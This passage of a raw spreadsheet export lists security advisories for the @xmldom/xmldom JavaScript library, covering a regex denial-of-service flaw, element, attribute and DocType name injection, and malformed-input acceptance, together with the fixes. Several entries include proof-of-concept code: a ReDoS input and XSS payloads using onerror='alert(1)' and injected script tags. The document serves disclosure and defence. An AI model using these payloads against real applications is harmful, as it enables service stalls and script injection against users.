The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits attribute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`setAttribute(name, value)` does not validate `name` at creation time (unlike the public `createAttribute()`, which already does). Making `setAttribute()` reject invalid names unconditionally is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), attribute names set via `setAttribute()` are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T1616" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t></is></c></row><row r="1617"><c r="A1617" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1617" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1617" s="5" t="inlineStr"><is><t>CVE-2026-83606</t></is></c><c r="D1617" s="5" t="inlineStr" /><c r="E1617" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1617" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1617" s="5" t="inlineStr" /><c r="H1617" s="5" t="n"><v>0.003</v></c><c r="I1617" s="5" t="inlineStr" /><c r="J1617" s="5" t="inlineStr" /><c r="K1617" s="5" t="inlineStr" /><c r="L1617" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1617" s="5" t="inlineStr"><is><t>0.9.11</t></is></c><c r="N1617" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1617" s="5" t="inlineStr" /><c r="R1617" s="5" t="inlineStr" /><c r="S1617" s="5" t="inlineStr"><is><t>## Summary

`@xmldom/xmldom`'s processing-instruction (PI) grammar regex exhibits quadratic-time backtracking
(ReDoS) when parsing an **unterminated** processing instruction. A single small XML document
containing `&lt;?` + a target + a long run of whitespace and no closing `?&gt;` forces the regular
expression engine into O(n²) work, stalling the Node.js event loop. The input is parsed with
`DOMParser.parseFromString` under **default options**, so it is reachable from unauthenticated,
network-delivered XML (SOAP/SAML, webhooks, uploads, XML APIs).

## Details

The PI production in `lib/grammar.js` compiles (flags `mu`) to:

```
^&lt;\?(NameChars)(?:[\x20\x09\x0D\x0A]+([Char]*?))?\?&gt;
                     ^^^ S+ greedy       ^^^ Char*? lazy
```

- `lib/grammar.js` line 261: https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/grammar.js#L261

In the optional tail `(?:S+(Char*?))?`, both the greedy separator `S+` and the lazy data `Char*?`
match XML whitespace. When the required trailing `?&gt;` is absent, the engine must ultimately fail —
but first it tries every partition of the whitespace run between `S+` and `Char*?`, which is O(n²)
in the length of the trailing whitespace.

The regex is executed against the **entire remaining source string** in two places in `lib/sax.js`,
so the whole whitespace tail is scanned:

- `parsePI` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L680-L691
- `parseProcessingInstruction` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L862-L879

## Affected Versions

Only the `0.9.x` line is affected. `lib/grammar.js` (and this PI regex) was introduced in
commit `726b471` ("fix!: preserve DOCTYPE internal subset (#498)"), first released in
**0.9.0-beta.9**, and is unchanged through **0.9.10**.

The `0.8.x` line (≤ 0.8.13) and the unscoped `xmldom` package (≤ 0.6.0) parse PIs via a different
code path bounded by `indexOf('?&gt;')` — they do **not** contain this regex and are **not affected**
by this issue. (They were not separately tested for a *different* PI ReDoS; the scope here is the
specific `grammar.js` regex.)

| Line | PI code path | Affected? |
|---|---|---|
| `0.9.x` (0.9.0-beta.9 … 0.9.10) | `grammar.js` `PI` regex over full remaining source | **Yes** |
| `0.8.x` (≤ 0.8.13) | `parseInstruction`, bounded by `indexOf('?&gt;')` | No |
| unscoped `xmldom` (≤ 0.6.0) | older `indexOf('?&gt;')`-bounded parsing | No |

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom');
const n = 32 * 1024;
const payload = '&lt;a&gt;&lt;?p' + ' '.repeat(n); // unterminated PI, no `?&gt;`
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18), trailing whitespace after `&lt;?p`, no `?&gt;` — time quadruples per doubling of
input length (canonical O(n²)):

| Trailing whitespace | `g.PI.exec` | `parseFromString` |
|---|---|---|
| 2 KB  | 4.4 ms    | 5.1 ms   |
| 4 KB  | 16.9 ms   | 17.0 ms  |
| 8 KB  | 111.4 ms  | 66.3 ms  |
| 16 KB | 263.8 ms  | 336.5 ms |
| 32 KB | 1073.1 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1 s at 32 KB; multi-second with larger inputs). No memory blow-up,
no data exposure, no integrity impact. Because XML is routinely accepted from untrusted sources and
parsed with default options, one request can stall a server.

## Fix Applied

Fixed in `@xmldom/xmldom` **0.9.11** (`0.9.x`-only; the `0.8.x` LTS line and the
unscoped `xmldom` package use a different, bounded PI code path and are not affected).

PR [#1039](https://github.com/xmldom/xmldom/pull/1039) inserts a fixed-width negative lookahead
`(?!\s)` immediately after the greedy `S+`, so the separator can no longer hand whitespace back to
the lazy data group:

```
- var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(', Char, '*?)'), '?', /\?&gt;/);
+ var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(?!', _SChar, ')(', Char, '*?)'), '?', /\?&gt;/);
```

The change is correct, minimal, and behavior-preserving: it produces identical `[target, data]`
captures on all valid PIs tested (incl. whitespace-heavy, tab/newline, empty-data, and xml-decl
cases) and removes the backtracking blow-up (linear, ~0.4 ms at 128 KB after the fix). The lookahead
is fixed-width and cannot itself backtrack — a strict improvement with no new parsing risk.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1617" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t></is></c></row><row r="1618"><c r="A1618" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1618" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1618" s="5" t="inlineStr"><is><t>CVE-2026-83607</t></is></c><c r="D1618" s="5" t="inlineStr" /><c r="E1618" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1618" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1618" s="5" t="inlineStr" /><c r="H1618" s="5" t="n"><v>0.003</v></c><c r="I1618" s="5" t="inlineStr" /><c r="J1618" s="5" t="inlineStr" /><c r="K1618" s="5" t="inlineStr" /><c r="L1618" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1618" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N1618" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1618" s="5" t="inlineStr" /><c r="R1618" s="5" t="inlineStr" /><c r="S1618" s="5" t="inlineStr"><is><t>## Summary

`Document.createElement()` in `@xmldom/xmldom` accepts arbitrary strings as the `tagName` parameter with zero validation. The serializer emits the tag name verbatim into XML/HTML output. Critically, the `requireWellFormed: true` serializer option — the recommended mitigation from CVE-2026-41672, CVE-2026-41674, and CVE-2026-34601 — did NOT catch this, making it a bypass of the existing security controls.

An attacker who controls the element name string can inject arbitrary attributes (including event handlers) into the serialized output, leading to XSS when the output is consumed by a browser or downstream parser.

## Details

`Document.createElement()` accepts any string as `tagName` and stores it directly on the element node without validation. When the document is later serialized via `XMLSerializer.serializeToString()`, the serializer emits the `tagName` verbatim into the output.

The XML specification requires element names to conform to the `Name` production. The existing `createAttributeNS()` and `createElementNS()` methods validate qualified names against an anchored name/`QName` pattern, but `createElement()` bypasses this entirely, and the `requireWellFormed: true` serializer path performed no element-name validation — rendering it ineffective against this vector.

### Root Cause

1. `createElement()` stores the raw `tagName` string without any validation.
2. The serializer's `requireWellFormed` code path did not validate element names against the XML `Name`/`QName` production.
3. The serializer emits `tagName` directly into angle brackets: `&lt;${tagName}...&gt;`.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// Inject an element whose "name" contains attributes with an XSS payload
const el = doc.createElement('img src=x onerror="alert(1)"');
doc.documentElement.appendChild(el);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;
//
// A browser parsing this HTML will execute alert(1).
// requireWellFormed: true did NOT prevent the injection.
```

## Impact

Applications that use `@xmldom/xmldom` to construct DOM trees and serialize them to XML/HTML are vulnerable to injection attacks if any part of an element name originates from user input. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes (`onerror`, `onclick`, etc.) into HTML output consumed by browsers.
- **XML injection**: Breaking XML document structure by injecting closing tags, new elements, or processing instructions through the element name.
- **Security control bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for CVE-2026-41672 / 41674 / 34601 remained vulnerable through this vector.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `createElement()`, which rejects an invalid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element's serialized qualified name against the XML `QName` production and throws `InvalidStateError` before emitting the start tag. This also covers the **namespace-prefix** sub-vector: an invalid prefix surfaces either in the element qualified name (`PREFIX:local`) or in a synthesized `xmlns:PREFIX` declaration, and both are QName-checked.

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.appendChild(doc.createElement('img src=x onerror="alert(1)"'));

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The element name "img src=x onerror="alert(1)"" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits element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`createElement(tagName)` does not validate `tagName` at creation time. Enforcing an `InvalidCharacterError` for invalid names unconditionally at creation time is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), invalid element names are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T1618" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t></is></c></row><row r="1619"><c r="A1619" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1619" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1619" s="5" t="inlineStr"><is><t>CVE-2026-83608</t></is></c><c r="D1619" s="5" t="inlineStr" /><c r="E1619" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1619" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1619" s="5" t="inlineStr" /><c r="H1619" s="5" t="n"><v>0.003</v></c><c r="I1619" s="5" t="inlineStr" /><c r="J1619" s="5" t="inlineStr" /><c r="K1619" s="5" t="inlineStr" /><c r="L1619" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1619" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1619" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1619" s="5" t="inlineStr" /><c r="R1619" s="5" t="inlineStr" /><c r="S1619" s="5" t="inlineStr"><is><t>## Summary

The `@xmldom/xmldom` serializer emits `DocumentType.name` verbatim into the
`&lt;!DOCTYPE …&gt;` declaration with no well-formedness guard. GHSA-f6ww-3ggp-fr8h
(CVE-2026-41674) hardened the serializer's `requireWellFormed` path for a
DocumentType's sibling fields — `publicId`, `systemId`, and `internalSubset` —
but it did **not** add any check for `name`. A `&gt;` (or whitespace) in the name
terminates the doctype declaration early, letting the remaining characters
become sibling markup in the serialized output.

Because `requireWellFormed: true` — the recommended mitigation for the prior
xmldom injection CVEs — performs no validation on the DocType `name`, this is a
bypass of that control, in the same family as the open element-name
(GHSA-w2rr-34g9-rvrj) and attribute-name (GHSA-4w3w-2rp5-g8jm) name-injection advisories.

## Details

The serializer's `DOCUMENT_TYPE_NODE` case runs the `requireWellFormed` block
only against `publicId`, `systemId`, and `internalSubset`, then pushes
`n.name` directly into the buffer between the `&lt;!DOCTYPE ` prefix and the
closing `&gt;`:

- 0.9.x (v0.9.10, `bb7a085`):
  [serializer DocType case, `lib/dom.js#L3256-L3283`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3256-L3283)
  — the `requireWellFormed` block ([#L3259-L3269](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3259-L3269))
  validates `publicId`/`systemId`/`internalSubset` but not `name`, which is
  emitted verbatim at [#L3270](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3270).
- 0.8.x (v0.8.13, `e5c1480`):
  [serializer DocType case, `lib/dom.js#L1914-L1946`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1914-L1946)
  — same structure; `name` is emitted verbatim at [#L1928](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1928).
- unscoped `xmldom` (v0.6.0, `c80a161`):
  [`lib/dom.js#L1105`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L1105)
  emits `node.name` verbatim; this line predates `requireWellFormed`, so there
  is no well-formedness path at all.

### Enabling write paths

`DocumentType.name` is a plain, writable own-property, so the enabling vector
differs by line:

- **0.9.x** — `createDocumentType()` validates the name via
  `validateQualifiedName` ([`lib/dom.js#L925-L936`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L925-L936),
  validation at [#L926](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L926)),
  so the deliverable vector is a **direct property write**
  (`dt.name = 'html&gt;&lt;script&gt;…'`) to the unguarded own-property.
- **0.8.x** — `createDocumentType()` does **not** validate the name
  ([`lib/dom.js#L456-L464`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L456-L464)),
  so the malicious name is reachable directly through `createDocumentType()` as
  well as via direct property write.
- **unscoped `xmldom` (&lt;= 0.6.0)** — `createDocumentType()` does not validate
  the name ([`lib/dom.js#L286`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L286)),
  same as 0.8.x.

This is the same structural root cause the sibling name-injection advisories
share: the serializer's `requireWellFormed` path validates content delimiters
but no name field, and every name-like field is a plain writable property, so
mutation / direct property-write bypasses any creation-time check.

### Root Cause

1. The serializer's `requireWellFormed` DocType block checks `publicId`,
   `systemId`, and `internalSubset` (the fields hardened by GHSA-f6ww-3ggp-fr8h)
   but has no check for `name`.
2. `DocumentType.name` is a plain writable own-property; on 0.8.x and the
   unscoped package `createDocumentType()` does not validate it either.
3. The serializer emits `name` directly between the doctype delimiters:
   `&lt;!DOCTYPE ${name}…&gt;`.

## Proof of Concept

Run against `@xmldom/xmldom` v0.9.10 (commit `bb7a085`):

```javascript
const { DOMImplementation, XMLSerializer, DOMParser } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();

// 0.9.x createDocumentType validates the name, so overwrite it via direct property write
const dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;
//
// requireWellFormed: true did NOT prevent the injection (no exception thrown).
// The injected &lt;script&gt; is well-formed XHTML that a browser would execute.
```

Confirmed runtime behavior:

- **0.9.x** — `createDocumentType()` rejects the malicious name at creation
  (`InvalidCharacterError`); a direct write to `dt.name` bypasses that, and
  `serializeToString(…, { requireWellFormed: true })` emits the breakout with no
  exception.
- **Re-parse confirmation** — re-parsing the output shows the injected
  `&lt;script&gt;` is a real second top-level element originating entirely from the
  DocType name: the parser rejects it with
  `HierarchyRequestError: Only one element can be added and only after doctype`.
  A comment-injection variant (`dt.name = 'html&gt;&lt;!--INJECTED--'`, output
  `&lt;!DOCTYPE html&gt;&lt;!--INJECTED--&gt;&lt;r/&gt;`) re-parses cleanly and the injected
  comment node is enumerable, confirming the injected node is structurally live.
- **0.8.x** (v0.8.13, `e5c1480`) — `createDocumentType('html&gt;&lt;script&gt;…', '', '')`
  accepts the malicious name directly (no creation-time validation), and
  `serializeToString(doc, null, null, { requireWellFormed: true })` produces
  `&lt;!DOCTYPE html&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;r/&gt;` with no exception.

A browser reproduction does not apply: browsers keep `DocumentType.name`
`readonly`, so the direct-write vector cannot be reproduced in a browser DOM.
The injection is specific to xmldom exposing `name` as writable and serializing
it without a guard.

## Impact

Applications that build a `DocumentType` node with an attacker-influenced
`name` — via direct property write on any affected line, or via
`createDocumentType()` on 0.8.x and the unscoped package — and serialize the
document are vulnerable to XML/markup injection:

- **XML structure injection** — breaking out of the `&lt;!DOCTYPE …&gt;` declaration
  to inject arbitrary sibling elements, comments, or additional markup into the
  output.
- **XSS via XHTML** — if the serialized output is served as XHTML or processed
  by a browser-based XML parser, an injected `&lt;script&gt;` element (in the XHTML
  namespace) executes.
- **requireWellFormed bypass** — applications that adopted
  `requireWellFormed: true` as a mitigation for the prior injection CVEs
  (including the sibling DocType fields fixed by GHSA-f6ww-3ggp-fr8h) remain
  vulnerable through the DocType `name`.

## Fix Applied

Under `requireWellFormed`, the serializer validates the DocType `name` as a well-formed XML
`Name` and throws `InvalidStateError` when it is not — matching the sibling
`publicId`/`systemId`/`internalSubset` checks. Non-breaking and opt-in; ships on both maintained versions. No
creation-time change is made: 0.9.x already validates the name at `createDocumentType`, and the
0.8.x/unscoped creation gap cannot be closed without a breaking change, so it is left
unfixed.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dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

// Default path: the ill-formed name is still emitted verbatim (injection present).
console.log(serializer.serializeToString(doc));
// &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;

// Opt-in path: serialization throws instead of emitting the breakout.
serializer.serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser
`XMLSerializer` emits the name verbatim in that default mode. Unconditionally
throwing would be an unjustified breaking change against that specified default,
so the guard is opt-in behind `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path still emits the ill-formed DocType `name`
verbatim; protection applies only when `requireWellFormed: true` is passed. No
creation-time validation is added for the DocType `name`: 0.9.x already validates
at `createDocumentType`, and the 0.8.x/unscoped creation gap is left unfixed — it
cannot be closed without a breaking change.</t></is></c><c r="T1619" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t></is></c></row><row r="1620"><c r="A1620" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1620" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1620" s="5" t="inlineStr"><is><t>CVE-2026-83609</t></is></c><c r="D1620" s="5" t="inlineStr" /><c r="E1620" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1620" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1620" s="5" t="inlineStr" /><c r="H1620" s="5" t="n"><v>0.003</v></c><c r="I1620" s="5" t="inlineStr" /><c r="J1620" s="5" t="inlineStr" /><c r="K1620" s="5" t="inlineStr" /><c r="L1620" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1620" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1620" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1620" s="5" t="inlineStr" /><c r="R1620" s="5" t="inlineStr" /><c r="S1620" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses xmldom's always-on, WHATWG-mandated creation-time name
validation. `createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` should
reject a malformed qualified name with `InvalidCharacterError`, but a name whose first line is
well-formed slips through and enters the DOM. On serialization it is emitted verbatim, so the
characters after the line terminator inject markup into the output. The injection reaches the default
serialization path, and enabling `requireWellFormed` does not prevent it.

## Details

`createElementNS`, `createAttributeNS`, and `createDocumentType` route through `validateQualifiedName`,
and `createAttribute` performs the analogous check; each validates the name with
`g.QName_exact.test(name)`. `QName_exact = reg('^', QName, '$')` inherits the `m` flag from xmldom's
shared regexp builder, so the matcher accepts any name whose first line is a valid `QName` and leaves
the remaining lines unconstrained (see Root Cause).

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. `validateQualifiedName` / `createAttribute` validate with `.test()` against such a production, so a
   line terminator followed by breakout markup passes and the malformed name is stored.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

const doc = impl.createDocument('urn:x', 'root', null);
const el = doc.createElementNS('urn:x', 'a\n&gt;&lt;script&gt;x&lt;/script');  // ACCEPTED (no throw)
doc.documentElement.appendChild(el);

// DEFAULT serialization — requireWellFormed NOT set:
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;root xmlns="urn:x"&gt;&lt;a
// &gt;&lt;script&gt;x&lt;/script/&gt;&lt;/root&gt;          &lt;-- injected element on the default path
// Control: createElementNS('urn:x', 'bad&gt;name') throws InvalidCharacterError, confirming the check is
// active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the always-on WHATWG creation-time name validation** (`InvalidCharacterError`): a
  malformed name the standard requires be rejected at creation is instead admitted to the DOM.
- **Markup / structure injection.** An application relying on the `create*` APIs to reject malformed
  names (the standard behavior) as a trust boundary is exposed; where the serialized output reaches an
  HTML context, downstream XSS.
- **No serializer option mitigates it.** The admitted name is emitted verbatim under *both* the default
  path and `requireWellFormed: true` — the strict serializer shares the same `m`-flagged blind spot
  (the subject of the sibling serializer advisories) — so the bypassed creation-time check was the only
  layer that could have stopped it. Demonstrated for all four `create*` sites in
  `poc_creation_strict_serialization_bypass.cjs`.

## Fix Applied

`createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` now reject a name
containing a line terminator with `InvalidCharacterError` — the same result they already give for
other malformed names — because name validation now applies to the whole string. The
`requireWellFormed` serializer's name checks are corrected by the same change. The fix is
non-breaking: such a name was already invalid, and no previously-accepted well-formed name is affected.</t></is></c><c r="T1620" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t></is></c></row><row r="1621"><c r="A1621" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1621" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1621" s="5" t="inlineStr"><is><t>CVE-2026-83611</t></is></c><c r="D1621" s="5" t="inlineStr" /><c r="E1621" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1621" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1621" s="5" t="inlineStr" /><c r="H1621" s="5" t="n"><v>0.004</v></c><c r="I1621" s="5" t="inlineStr" /><c r="J1621" s="5" t="inlineStr" /><c r="K1621" s="5" t="inlineStr" /><c r="L1621" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1621" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1621" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1621" s="5" t="inlineStr" /><c r="R1621" s="5" t="inlineStr" /><c r="S1621" s="5" t="inlineStr"><is><t>## Summary

xmldom's parser silently accepts a **not-well-formed end tag** whose valid name is followed by
trailing content — e.g. `&lt;/a⏎junk&gt;`. The element is closed, the trailing content is discarded, and no
error is reported, even though the XML end-tag production allows only optional whitespace after the
name and both Chromium and Firefox reject such input as `application/xml`. An application that relies
on xmldom to reject not-well-formed input therefore receives a false "valid" result for a document the
specification and browsers consider malformed.

## Details

Across every affected version, an end tag whose valid `Name` is followed by trailing content before
`&gt;` is silently accepted: the element is closed, the residue is dropped, and no error is reported. How
much leaks differs by line (see Affected Versions), but the observable weakness is the same.

On the current (`0.9.x`) line, the parser validates the end-tag name against the XML `ETag` production
with an anchored regular expression (`^ QName S? $`). That expression is compiled with the `m`
(multiline) flag by a shared builder, so `$` matches at an interior line terminator: a valid name on
the first line satisfies the anchored production and any content after the line break escapes the
check. On 0.9.x the whitespace-separated variant (`&lt;/a junk&gt;`) is already rejected; only the
line-terminator variant leaks. Older lines have no anchored end-tag validator at all, so they accept
both the line-terminator and the whitespace variant.

This is **not** content injection — the trailing content is dropped, and the resulting DOM is a normal
single-root document (`&lt;a/&gt;`). The security-relevant property is the silent acceptance of
not-well-formed input: xmldom's parse result disagrees with the specification and with browser XML
parsers, so any control that treats "xmldom parsed it without error" as "well-formed" is bypassed.

### Root Cause

On the `0.9.x` line, where the line-terminator variant specifically leaks:

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. The anchored end-tag production `^ QName S? $` is therefore satisfied by the first line alone, so
   trailing content after a line terminator is neither matched nor rejected — the malformed end tag is
   accepted and the residue silently discarded.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
U+2028 and U+2029 are not XML whitespace, so they are non-conforming trailing content that nonetheless
leaks because the JavaScript `$` anchor treats them as line boundaries under `m`.

## Affected Versions

Both maintained versions are affected and fixed:

- **`0.9.x`** (`&gt;= 0.9.0, &lt;= 0.9.11`) → **`0.9.12`**: the anchored end-tag validator's `m` flag leaks
  the line-terminator variant. The whitespace variant (`&lt;/a junk&gt;`) is already rejected on this line.
- **`0.8.x`** (`&gt;= 0.8.0, &lt;= 0.8.14`) → **`0.8.15`**: no anchored end-tag validator at all — both the
  line-terminator and the whitespace variant are silently accepted; the fix adds a residue check.

`release-0.7.x` (`&lt;= 0.7.13`) and the unscoped `xmldom` package (range `*`, last release 0.6.0) are
**affected but will not be patched** — they are end-of-life / unmaintained. They share the older-line
behavior (both variants silently accepted, residue dropped).

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMParser().parseFromString('&lt;a&gt;&lt;/a\njunk&gt;', 'text/xml'); // no error
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;a/&gt;   — the malformed end tag is accepted, "junk" silently discarded, no error reported.
// Expected (per XML spec / Chromium / Firefox): a parse error — the input is not well-formed.
```

## Impact

- **Silent acceptance of not-well-formed XML**: a document the specification and browser XML parsers
  reject is parsed without error.
- **Bypass of a well-formedness / parse-before-trust gate**: an application relying on xmldom to
  reject malformed input treats such a document as valid. Note this is an input-validation /
  parser-differential issue, not content injection — the trailing content is discarded.

## Fix Applied

The parser now reports a not-well-formed end tag whose valid name is followed by trailing content, on both `0.9.12` and `0.8.15` — previously it was accepted silently — and parsing recovers to the byte-identical DOM as before.\
On `0.9.12` the anchored end-tag validator is corrected so a line break followed by trailing content no longer satisfies it, reported as a recoverable `error` when parsing as XML and a `warning` when parsing as HTML.\
On `0.8.15`, which previously performed no end-tag residue validation, an equivalent residue check is added, reported as a recoverable `error` in both XML and HTML.\
Well-formed documents are unaffected.

Because the report is recoverable, the fix is non-breaking: no previously-parsed document begins to
throw and no serialized output changes. Consumers that want strict rejection can escalate the reported
`error` to a fatal one via the parser's error handler (`onError` in `0.9.12`, `errorHandler` in
`0.8.15`). The two versions also differ in the whitespace-separated variant (`&lt;/a junk&gt;`): `0.9.12`
already rejected it with a fatal error in XML and continues to, while `0.8.15` — which validated
neither variant — now emits the same recoverable report for both the whitespace and line-break
variants.

### Residual limitation

By default the parser still **recovers** (it does not reject the document); the reported condition is a
